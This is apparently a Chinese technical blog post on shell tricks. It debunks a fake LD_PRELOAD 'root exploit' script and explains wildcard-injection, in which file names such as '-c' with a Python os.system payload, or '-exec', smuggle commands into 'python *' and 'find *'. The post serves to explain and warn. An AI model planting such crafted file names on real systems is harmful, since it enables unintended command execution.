高级shell

在国外网上流传了这么一段脚本，号称运行后就可获得root权限：

#!/bin/sh
echo "1|nux r007 3xp10|7 by 1c4m7uf"
cd /tmp
cat >ex.c <<eof
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
eof
gcc -shared ex.c -oex.so
LD_PRELOAD=/tmp/ex.so sh
rm /tmp/ex.so /tmp/ex.c

执行结果如下：

bash test.sh
1|nux r007 3xp10|7 by 1c4m7uf
sh-4.3# id
uid=0(root) gid=0(root) 组=0(root),1000(lu4nx) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.3#

这里要注意脚本用到了LD_PRELOAD环境变量，它可以指定一个动态链接库在加载其他.so（比如glibc）之前优先加载。上面的代码实质上编译了一个动态链接库，那段C代码重新实现了getuid、geteuid、getgid和getegid，并且全部返回0（返回0表示root），等同劫持了getuid等函数。shell权限在判断是root时，提示符会变成“#”；而id命令也是调用了这几个函数。这里实际上只是个假象，并没有真正获得root权限，但要注意这个环境变量可能导致其他程序逻辑判断。

shell在遇到字符“*”时，会把它转变成当前目录下全部文件，比如目录下有a、b和c三个文件，当执行“ls *”时，shell会将最终执行的命令转变成“ls a b c”。

假如目录下有一个文件名叫“-l”：

$  ls
-l

当执行：ls *时，-l会被展开成参数：

$  ls *
总用量 0
-rw-rw-r--. 1 lu4nx lu4nx 0 12月  8 10:37 -l

利用这个特性，我们可以把文件名构造得像参数一样，很容易引起安全隐患。

例1

当前目录下的两个文件：

$ ls
-c  '__import__('\''os'\'').system('\''id'\'')'

当执行python *时就会出问题：

$  python *
uid=1000(lu4nx) gid=1000(lu4nx) 组=1000(lu4nx) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

例2 当目录下有这几个文件时：

$ ls
-exec  id

执行find命令：

$  find * \;
uid=1000(lu4nx) gid=1000(lu4nx) 组=1000(lu4nx) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=1000(lu4nx) gid=1000(lu4nx) 组=1000(lu4nx) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
uid=1000(lu4nx) gid=1000(lu4nx) 组=1000(lu4nx) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

唯一鸡肋的地方是命令必须加“;”，通过对Bash的源码调试，发现如果创建了一个叫“;”的文件，通配符展开时，“;”比较靠前，导致无法正确解析。展开后的命令如下：

find ; -exec id